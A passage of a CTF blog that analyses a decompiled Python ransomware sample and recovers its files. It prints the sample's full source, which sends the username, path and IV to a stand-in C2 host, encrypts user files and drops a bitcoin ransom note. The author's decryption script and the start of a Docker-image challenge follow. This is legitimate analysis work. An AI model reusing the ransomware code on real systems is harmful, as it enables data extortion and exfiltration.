class="s1">'Wang Laichun'</span><span class="p">,</span> <span class="s1">'Masayoshi Son'</span><span class="p">,</span> <span class="s1">'Min Kao'</span><span class="p">,</span> <span class="s1">'Hiroshi Mikitani'</span><span class="p">,</span> <span class="s1">'Lee Kun-Hee'</span><span class="p">,</span> <span class="s1">'David Sun'</span><span class="p">,</span> <span class="s1">'Mark Scheinberg'</span><span class="p">,</span> <span class="s1">'Yeung Kin-man'</span><span class="p">,</span> <span class="s1">'John Tu'</span><span class="p">,</span> <span class="s1">'Teddy Sagi'</span><span class="p">,</span> <span class="s1">'Frank Wang'</span><span class="p">,</span> <span class="s1">'Robert Pera'</span><span class="p">,</span> <span class="s1">'Eric Schmidt'</span><span class="p">,</span> <span class="s1">'Wang Xing'</span><span class="p">,</span> <span class="s1">'Evan Spiegel'</span><span class="p">,</span> <span class="s1">'Travis Kalanick'</span><span class="p">,</span> <span class="s1">'Steve Ballmer'</span><span class="p">,</span> <span class="s1">'Mark Zuckerberg'</span><span class="p">,</span> <span class="s1">'Jason Chang'</span><span class="p">,</span> <span class="s1">'Lam Wai Ying'</span><span class="p">,</span> <span class="s1">'Romesh T. Wadhwani'</span><span class="p">,</span> <span class="s1">'Liu Qiangdong'</span><span class="p">,</span> <span class="s1">'Jim Breyer'</span><span class="p">,</span> <span class="s1">'Zhang Zhidong'</span><span class="p">,</span> <span class="s1">'Pierre Omidyar'</span><span class="p">,</span> <span class="s1">'Elon Musk'</span><span class="p">,</span> <span class="s1">'David Filo'</span><span class="p">,</span> <span class="s1">'Joe Gebbia'</span><span class="p">,</span> <span class="s1">'Jiang Bin'</span><span class="p">,</span> <span class="s1">'Pan Zhengmin'</span><span class="p">,</span> <span class="s1">'Douglas Leone'</span><span class="p">,</span> <span class="s1">'Hasso Plattner'</span><span class="p">,</span> <span class="s1">'Paul Allen'</span><span class="p">,</span> <span class="s1">'Meg Whitman'</span><span class="p">,</span> <span class="s1">'Azim Premji'</span><span class="p">,</span> <span class="s1">'Fu Liquan'</span><span class="p">,</span> <span class="s1">'Jeff Rothschild'</span><span class="p">,</span> <span class="s1">'John Sall'</span><span class="p">,</span> <span class="s1">'Kim Jung-Ju'</span><span class="p">,</span> <span class="s1">'David Duffield'</span><span class="p">,</span> <span class="s1">'Gabe Newell'</span><span class="p">,</span> <span class="s1">'Scott Lin'</span><span class="p">,</span> <span class="s1">'Eduardo Saverin'</span><span class="p">,</span> <span class="s1">'Jeffrey Skoll'</span><span class="p">,</span> <span class="s1">'Thomas Siebel'</span><span class="p">,</span> <span class="s1">'Kwon Hyuk-Bin'</span><span class="p">]</span>
<span class="k">def</span> <span class="nf">get_username</span><span class="p">():</span>
    <span class="k">return</span> <span class="n">getpass</span><span class="o">.</span><span class="n">getuser</span><span class="p">()</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">xorbytes</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">a</span><span class="p">)</span> <span class="o">==</span> <span class="nb">len</span><span class="p">(</span><span class="n">b</span><span class="p">)</span>
    <span class="n">res</span> <span class="o">=</span> <span class="s1">''</span>
    <span class="k">for</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span> <span class="ow">in</span> <span class="nb">zip</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
        <span class="n">res</span> <span class="o">+=</span> <span class="nb">bytes</span><span class="p">([</span><span class="n">c</span> <span class="o">^</span> <span class="n">d</span><span class="p">])</span>
    <span class="k">return</span> <span class="n">res</span>
<span class="k">def</span> <span class="nf">lock_file</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
    <span class="n">username</span> <span class="o">=</span> <span class="n">get_username</span><span class="p">()</span>
    <span class="n">hsh</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="s1">'md5'</span><span class="p">)</span>
    <span class="n">hsh</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">username</span><span class="p">)</span>
    <span class="n">key</span> <span class="o">=</span> <span class="n">hsh</span><span class="o">.</span><span class="n">digest</span><span class="p">()</span>
    <span class="n">cip</span> <span class="o">=</span> <span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
    <span class="n">iv</span> <span class="o">=</span> <span class="n">get_random_bytes</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
    <span class="n">params</span> <span class="o">=</span> <span class="p">((</span><span class="s1">'target'</span><span class="p">,</span> <span class="n">username</span><span class="p">),</span> <span class="p">(</span><span class="s1">'path'</span><span class="p">,</span> <span class="n">path</span><span class="p">),</span> <span class="p">(</span><span class="s1">'iv'</span><span class="p">,</span> <span class="n">iv</span><span class="p">))</span>
    <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">C2_URL</span><span class="p">,</span> <span class="n">params</span><span class="o">=</span><span class="n">params</span><span class="p">)</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fi</span><span class="p">:</span>
        <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span> <span class="o">+</span> <span class="s1">'.hacked'</span><span class="p">,</span> <span class="s1">'wb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fo</span><span class="p">:</span>
            <span class="n">block</span> <span class="o">=</span> <span class="n">fi</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
            <span class="k">while</span> <span class="n">block</span><span class="p">:</span>
                <span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">block</span><span class="p">)</span> <span class="o"><</span> <span class="mi">16</span><span class="p">:</span>
                    <span class="n">block</span> <span class="o">+=</span> <span class="nb">bytes</span><span class="p">([</span><span class="mi">0</span><span class="p">])</span>
                <span class="n">cipherblock</span> <span class="o">=</span> <span class="n">cip</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">xorbytes</span><span class="p">(</span><span class="n">block</span><span class="p">,</span> <span class="n">iv</span><span class="p">))</span>
                <span class="n">iv</span> <span class="o">=</span> <span class="n">cipherblock</span>
                <span class="n">fo</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">cipherblock</span><span class="p">)</span>
                <span class="n">block</span> <span class="o">=</span> <span class="n">fi</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
    <span class="n">os</span><span class="o">.</span><span class="n">unlink</span><span class="p">(</span><span class="n">path</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">lock_files</span><span class="p">():</span>
    <span class="n">username</span> <span class="o">=</span> <span class="n">get_username</span><span class="p">()</span>
    <span class="k">if</span> <span class="n">username</span> <span class="ow">in</span> <span class="n">TARGETS</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">directory</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">filenames</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">TARGET_DIR</span><span class="p">):</span>
            <span class="k">for</span> <span class="n">filename</span> <span class="ow">in</span> <span class="n">filenames</span><span class="p">:</span>
                <span class="k">if</span> <span class="n">filename</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">'.hacked'</span><span class="p">):</span>
                    <span class="k">continue</span>
                <span class="n">fullpath</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">directory</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span>
                <span class="nb">print</span><span class="p">(</span><span class="s1">'Encrypting'</span><span class="p">,</span> <span class="n">fullpath</span><span class="p">)</span>
                <span class="n">lock_file</span><span class="p">(</span><span class="n">fullpath</span><span class="p">)</span>
        <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">TARGET_DIR</span><span class="p">,</span> <span class="s1">'READ_THIS.txt'</span><span class="p">),</span> <span class="s1">'wb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fo</span><span class="p">:</span>
            <span class="n">fo</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'We have hacked all your files. Buy 1 BTC and contact us at hacked@virus.com</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="n">lock_files</span><span class="p">()</span>
<span class="c1"># okay decompiling virus.cpython-37.pyc</span>
</code></pre></div>
<h2>How it works</h2>
<p>Before decrypting anything, we need to understand how the files were encrypted.</p>
<p>The script checks that the current user is in the target list (<code>if username in TARGETS:</code>) before encrypting every file found under the target directory (<code>for directory, _, filenames in os.walk(TARGET_DIR):</code>), that is the whole <code>C:\Users</code> folder of the machine. Each file is encrypted with the <code>def lock_file(path)</code> function.</p>
<h3>The <code>lock_file</code> function</h3>
<p>This function uses the Python libraries <code>hashlib</code> (<a href="https://docs.python.org/3/library/hashlib.html">https://docs.python.org/3/library/hashlib.html</a>) and <code>Crypto</code> (<a href="https://www.dlitz.net/software/pycrypto/">https://www.dlitz.net/software/pycrypto/</a>).</p>
<p>The first provides hash functions. Here, the <code>md5</code> digest of the current user name is computed and then used as the encryption key. The encryption is therefore defined as follows:</p>
<ul>
<li>key: <code>md5</code> hash of <code>get_username</code></li>
<li>algorithm: <code>1</code>, which corresponds to the <code>AES_ECB</code> mode</li>
<li>block length: 16 bytes (default value)</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="n">AES</span><span class="o">.</span><span class="n">MODE_ECB</span>
<span class="mi">1</span>
</code></pre></div>
<p>The following diagram illustrates how <code>ECB</code> mode works:</p>
<p><img alt="https://upload.wikimedia.org/wikipedia/commons/thumb/d/d6/ECB_encryption.svg/601px-ECB_encryption.svg.png" src="https://upload.wikimedia.org/wikipedia/commons/a/a6/Schema_ecb.png"></p>
<p>This mode encrypts each block separately with the given key. It is not recommended, because patterns present in the source data remain visible in the ciphertext. Its one advantage is that any part of the data can be decrypted on its own.</p>
<p>An <code>iv</code> variable is initialised with 16 random bytes:</p>
<div class="highlight"><pre><span></span><code> <span class="n">iv</span> <span class="o">=</span> <span class="n">get_random_bytes</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
</code></pre></div>
<p>Once the cipher is set up, all the parameters are sent to a C2 (Command and Control) server (<code>'https://c2.virus.com/'</code>) so that the attacker can later decrypt the files.</p>
<div class="highlight"><pre><span></span><code> <span class="n">params</span> <span class="o">=</span> <span class="p">((</span><span class="s1">'target'</span><span class="p">,</span> <span class="n">username</span><span class="p">),</span> <span class="p">(</span><span class="s1">'path'</span><span class="p">,</span> <span class="n">path</span><span class="p">),</span> <span class="p">(</span><span class="s1">'iv'</span><span class="p">,</span> <span class="n">iv</span><span class="p">))</span>
<span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">C2_URL</span><span class="p">,</span> <span class="n">params</span><span class="o">=</span><span class="n">params</span><span class="p">)</span>
</code></pre></div>
<p>The source file is then opened (<code>with open(path, 'rb') as fi:</code>) and the output file is created by adding the new extension seen in the archive (<code>with open(path + '.hacked', 'wb') as fo:</code>).</p>
<p>The source file is read in 16-byte blocks, and the last block is padded with <code>0</code> bytes if it is shorter.</p>
<div class="highlight"><pre><span></span><code> <span class="n">block</span> <span class="o">=</span> <span class="n">fi</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
<span class="k">while</span> <span class="n">block</span><span class="p">:</span>
<span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">block</span><span class="p">)</span> <span class="o"><</span> <span class="mi">16</span><span class="p">:</span>
<span class="n">block</span> <span class="o">+=</span> <span class="nb">bytes</span><span class="p">([</span><span class="mi">0</span><span class="p">])</span>
</code></pre></div>
<p>The block is encrypted with the following code:</p>
<div class="highlight"><pre><span></span><code> <span class="n">cipherblock</span> <span class="o">=</span> <span class="n">cip</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">xorbytes</span><span class="p">(</span><span class="n">block</span><span class="p">,</span> <span class="n">iv</span><span class="p">))</span>
<span class="n">iv</span> <span class="o">=</span> <span class="n">cipherblock</span>
<span class="n">fo</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">cipherblock</span><span class="p">)</span>
</code></pre></div>
<h3>The <code>xorbytes</code> function</h3>
<p>Before the AES encryption is applied, the following function is called:</p>
<p><code>def xorbytes(a, b)</code></p>
<p>It performs the bitwise <code>XOR</code> operation between two blocks of data, here <code>block</code> (the 16 bytes just read) and <code>iv</code>. This operation has the following truth table:</p>
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
<th>A ⊕ B</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>0</td>
<td>0</td>
</tr>
<tr>
<td>0</td>
<td>1</td>
<td>1</td>
</tr>
<tr>
<td>1</td>
<td>0</td>
<td>1</td>
</tr>
<tr>
<td>1</td>
<td>1</td>
<td>0</td>
</tr>
</tbody>
</table>
<h3>Final encryption scheme</h3>
<p>However, <code>ECB</code> mode combined with an <code>XOR</code> against an initialisation vector (the <code>iv</code> variable, which is replaced by each new ciphertext block) is in fact <code>AES CBC</code> encryption, as the following diagram shows:</p>
<p><img alt="https://upload.wikimedia.org/wikipedia/commons/4/42/Schema_CBC.svg" src="https://upload.wikimedia.org/wikipedia/commons/4/42/Schema_CBC.svg"></p>
<p><em>note: an initialisation vector is a block of bits combined with the first data block. It makes the result less predictable.</em></p>
<h2>Decryption</h2>
<p>We now have everything we need to decrypt the files. The first 16 bytes depend on the random <code>iv</code>, but we know these files were originally <code>JPEG</code>s, so we replace this first block with the one matching the <code>JPEG</code> magic number: <code>ffd8ffe000104a464946000100000000</code>. <code>CBC</code> mode does the rest of the decryption automatically (the value used as <code>iv</code> does not matter, since the first plaintext block is replaced by the magic number anyway).</p>
<div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span>
<span class="kn">import</span> <span class="nn">hashlib</span><span class="o">,</span> <span class="nn">os</span>
<span class="c1"># First 16 bytes of a JFIF file, written in place of the first (unrecoverable) block</span>
<span class="n">JFIF_HEADER</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">'</span><span class="se">\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x00\x00\x00\x00</span><span class="s1">'</span>
<span class="k">def</span> <span class="nf">unlock_file</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">path</span><span class="p">):</span>
    <span class="c1"># Same key derivation as the virus: MD5 digest of the user name</span>
    <span class="n">hsh</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="s1">'md5'</span><span class="p">)</span>
    <span class="n">hsh</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">username</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span>
    <span class="n">key</span> <span class="o">=</span> <span class="n">hsh</span><span class="o">.</span><span class="n">digest</span><span class="p">()</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fi</span><span class="p">:</span>
        <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">".hacked"</span><span class="p">,</span> <span class="s2">""</span><span class="p">),</span> <span class="s1">'wb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fo</span><span class="p">:</span>
            <span class="c1"># The first ciphertext block was chained with an unknown random iv, so its</span>
            <span class="c1"># plaintext cannot be recovered: use it as the iv for the rest of the chain</span>
            <span class="c1"># and write the known JPEG header in its place.</span>
            <span class="n">first</span> <span class="o">=</span> <span class="n">fi</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
            <span class="n">cip</span> <span class="o">=</span> <span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="o">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">first</span><span class="p">)</span>
            <span class="n">fo</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">JFIF_HEADER</span><span class="p">)</span>
            <span class="n">block</span> <span class="o">=</span> <span class="n">fi</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
            <span class="k">while</span> <span class="n">block</span><span class="p">:</span>
                <span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">block</span><span class="p">)</span> <span class="o"><</span> <span class="mi">16</span><span class="p">:</span>
                    <span class="n">block</span> <span class="o">+=</span> <span class="nb">bytes</span><span class="p">([</span><span class="mi">0</span><span class="p">])</span>
                <span class="n">fo</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">cip</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">block</span><span class="p">))</span>
                <span class="n">block</span> <span class="o">=</span> <span class="n">fi</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">unlock_files</span><span class="p">(</span><span class="n">target</span><span class="p">):</span>
    <span class="n">username</span> <span class="o">=</span> <span class="s2">"Jack Sheerack"</span>
    <span class="k">for</span> <span class="n">directory</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">filenames</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">target</span><span class="p">):</span>
        <span class="k">for</span> <span class="n">filename</span> <span class="ow">in</span> <span class="n">filenames</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">filename</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">'.hacked'</span><span class="p">):</span>
                <span class="n">fullpath</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">directory</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span>
                <span class="nb">print</span><span class="p">(</span><span class="s1">'Decrypting'</span><span class="p">,</span> <span class="n">fullpath</span><span class="p">)</span>
                <span class="n">unlock_file</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">fullpath</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="n">unlock_files</span><span class="p">(</span><span class="s2">"vacation pictures"</span><span class="p">)</span>
</code></pre></div>
<p>The username was chosen by deduction from the challenge name (<code>Jacques</code>). Trying the other values present would not take long in any case.</p>
<p>We run our script:</p>
<div class="highlight"><pre><span></span><code>$ python3 decrypt.py
Decrypting vacation pictures/DCIM-0536.jpg.hacked
Decrypting vacation pictures/DCIM-0533.jpg.hacked
Decrypting vacation pictures/DCIM-0534.jpg.hacked
Decrypting vacation pictures/DCIM-0535.jpg.hacked
$ tree vacation<span class="se">\ </span>pictures
vacation pictures
├── DCIM-0533.jpg
├── DCIM-0533.jpg.hacked
├── DCIM-0534.jpg
├── DCIM-0534.jpg.hacked
├── DCIM-0535.jpg
├── DCIM-0535.jpg.hacked
├── DCIM-0536.jpg
├── DCIM-0536.jpg.hacked
└── READ_THIS.txt
$ file vacation<span class="se">\ </span>pictures/DCIM-0533.jpg
vacation pictures/DCIM-0533.jpg: JPEG image data, JFIF standard <span class="m">1</span>.00, aspect ratio, density 0x21932, segment length <span class="m">16</span>, thumbnail 230x244
</code></pre></div>
<p>OK, everything looks good. So we open the images, finally looking for our flag:</p>
<p><img alt="DCIM-0534.jpg" src="https://blog.nlegall.fr/images/santhacklaus/DCIM-0534.jpg"></p>
<p>FLAAAG !</p>
<p><img alt="https://i.giphy.com/media/11sBLVxNs7v6WA/giphy.webp" src="https://i.giphy.com/media/11sBLVxNs7v6WA/giphy.webp"></p>
<p>A very good challenge for getting to grips with cryptography and understanding its different modes of operation.</p>
<p><em>ps: I managed to finish and validate this challenge 5 minutes before the end. The finish was stressful, trying to get valid images (I had taken only the first 3 bytes of the <code>JPEG</code> instead of 16).</em></p>
Santhacklaus 2019 - Naughty Docker 2019-12-31T00:00:00+01:00 2019-12-31T00:00:00+01:00 nlegall tag:blog.nlegall.fr,2019-12-31:/santhacklaus-2019-naughty-docker.html
<div class="highlight"><pre><span></span><code>It looks like a naughty developer has been deploying a Docker image on a Santa production server a few days before Christmas. He was in a rush and was not able to properly pass all security checks on the built Docker image. Would be a shame if this image could give you an SSH access to the production server... http://46.30.204.47"
</code></pre></div>
<p>First step, then: visit the website indicated.</p>
<p><img alt="NaughtyDocker1" src="https://blog.nlegall.fr/images/santhacklaus/NaughtyDocker1.png"></p>
<p>We now have the name of the Docker image (<code>santactf/app</code>) along with the command to run it. Which we do right away :).</p>
<div class="highlight"><pre><span></span><code>$ docker run --rm -p <span class="m">3000</span>:3000 -d santactf/app
Unable to find image <span class="s1">'santactf/app:latest'</span> locally
latest: Pulling from santactf/app
844c33c7e6ea: Pull <span class="nb">complete</span>
ada5d61ae65d: Pull <span class="nb">complete</span>
f8427fdf4292: Pull <span class="nb">complete</span>
f025bafc4ab8: Pull <span class="nb">complete</span>
7a9577c07934: Pull <span class="nb">complete</span>
add4f74c413b: Pull <span class="nb">complete</span>
1ee7a33fb93f: Pull <span class="nb">complete</span>
08ab1881dcea: Pull <span class="nb">complete</span>
96f3027f0dbd: Pull <span class="nb">complete</span>
cb67eac57f41: Pull <span class="nb">complete</span>
bf44330d5df8: Pull <span class="nb">complete</span>
4932e843cace: Pull <span class="nb">complete</span>
f0b9c596601c: Pull <span class="nb">complete</span>
Digest: sha256:621c884f7ddd0351fbb114e0b9c1d4d3b0e309cb5c5efc9ce872fd201af79cad
Status: Downloaded newer image <span class="k">for</span> santactf/app:latest
8c5aff2e1ca7ee420ed7599494d53a3d6fbdeab47f6a034c6c52ea2e6b3ba329
$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
8c5aff2e1ca7 santactf/app <span class="s2">"docker-entrypoint.s…"</span> <span class="m">24</span> seconds ago Up <span class="m">17</span> seconds <span class="m">0</span>.0.0.0:3000->3000/tcp festive_easley
</code></pre></div>
<p>OK. Our container is started. Let's see what we can get on port 3000:</p>
<p><img alt="NaughtyDocker2" src="https://blog.nlegall.fr/images/santhacklaus/NaughtyDocker2.png"></p>
<p>Nothing conclusive in itself...</p>
<p>Let's look at the contents of the container and at how the application works:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># Connect directly as root via -u 0</span>
$ docker <span class="nb">exec</span> -u <span class="m">0</span> -it 8c5aff2e1ca7 bash
root@8c5aff2e1ca7:/home/node# id
<span class="nv">uid</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span>
root@8c5aff2e1ca7:/home/node# ls
node_modules package-lock.json package.json server.js
root@8c5aff2e1ca7:/home/node# ls -al
total <span class="m">44</span>
drwxr-xr-x <span class="m">1</span> root root <span class="m">4096</span> Dec <span class="m">18</span> <span class="m">20</span>:55 .
drwxr-xr-x <span class="m">1</span> root root <span class="m">4096</span> Dec <span class="m">16</span> <span class="m">07</span>:28 ..
-rw-r--r-- <span class="m">1</span> node node <span class="m">220</span> May <span class="m">15</span> <span class="m">2017</span> .bash_logout
-rw-r--r-- <span class="m">1</span> node node <span class="m">675</span> May <span class="m">15</span> <span class="m">2017</span> .profile
drwxr-xr-x <span class="m">45</span> root root <span class="m">4096</span> Dec <span class="m">18</span> <span class="m">20</span>:55 node_modules
-rw-r--r-- <span class="m">1</span> root root <span class="m">12606</span> Dec <span class="m">16</span> <span class="m">23</span>:34 package-lock.json
-rw-r--r-- <span class="m">1</span> root root <span class="m">241</span> Dec <span class="m">16</span> <span class="m">23</span>:34 package.json
-rw-r--r-- <span class="m">1</span> root root <span class="m">458</span> Dec <span class="m">18</span> <span class="m">20</span>:53 server.js
</code></pre></div>
<p>So it is a Node.js application that is running. The main file is server.js:</p>
<div class="highlight"><pre><span></span><code><span class="kr">const</span> <span class="nx">fastify</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'fastify'</span><span class="p">)({</span>
<span class="nx">logger</span><span class="o">:</span> <span class="kc">true</span>
<span class="p">});</span>
<span class="nx">fastify</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">request</span><span class="p">,</span> <span class="nx">reply</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">reply</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'Some production Santa CTF app'</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">fastify</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="mi">3000</span><span class="p">,</span> <span class="s1">'0.0.0.0'</span><span class="p">,</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">err</span><span class="p">,</span> <span class="nx">address</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">fastify</span><span class="p">.</span><span class="nx">log</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="nx">err</span><span class="p">);</span>
<span class="nx">process</span><span class="p">.</span><span class="nx">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">fastify</span><span class="p">.</span><span class="nx">log</span><span class="p">.</span><span class="nx">info</span><span class="p">(</span><span class="sb">`Server listening on </span><span class="si">${</span><span class="nx">address</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">process</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="s1">'SIGTERM'</span><span class="p">,</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="nx">fastify</span><span class="p">.</span><span class="nx">close</span><span class="p">(</span><span class="kd">function</span><span class="p">(){</span>
<span class="nx">process</span><span class="p">.</span><span class="nx">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">});</span>
<span class="p">});</span>
</code></pre></div>
<p>It's just a basic web server displaying the sentence seen above. Nothing on the file side or inside the container.</p>
<p>So let's look at how this image is built. When pulling it we saw that it is made of 13 layers in total. With no Dockerfile available, the <code>docker history</code> command can help us reconstruct it and understand the sequence of commands that produced it:</p>
<div class="highlight"><pre><span></span><code>$ docker <span class="nb">history</span> --no-trunc santactf/app:latest
IMAGE CREATED CREATED BY SIZE COMMENT
sha256:ddde36e2209357c424cca26ac5a0b46c2f864be797c053bed700422177ba7261 <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) CMD ["node" "server.js"] 0B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) USER node 0B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) COPY file:8b53431519dafa70baa13c0dd04861e8688090bfece040ae71244d2e14a66845 in /home/node/ 458B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c npm ci <span class="m">5</span>.59MB
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) COPY multi:2f093554c78265fc6aeb1cb343015e8e8e7227fee6a0504f55721b9af13a16a6 in /home/node/ 12.8kB </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) WORKDIR /home/node 0B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) EXPOSE 3000 0B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) CMD ["node"] 0B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) ENTRYPOINT ["docker-entrypoint.sh"] 0B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) COPY file:6781e799bed1693e0357678a6692f346b66879c2248ff055a2ff51cc0a83288b in /usr/local/bin/ 116B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c ln -s /usr/local/bin/node /usr/local/bin/nodejs <span class="o">&&</span> rm /home/node/.bashrc /home/node/.bash_history <span class="o">&&</span> rm -rf /usr/share/prod-common 19B
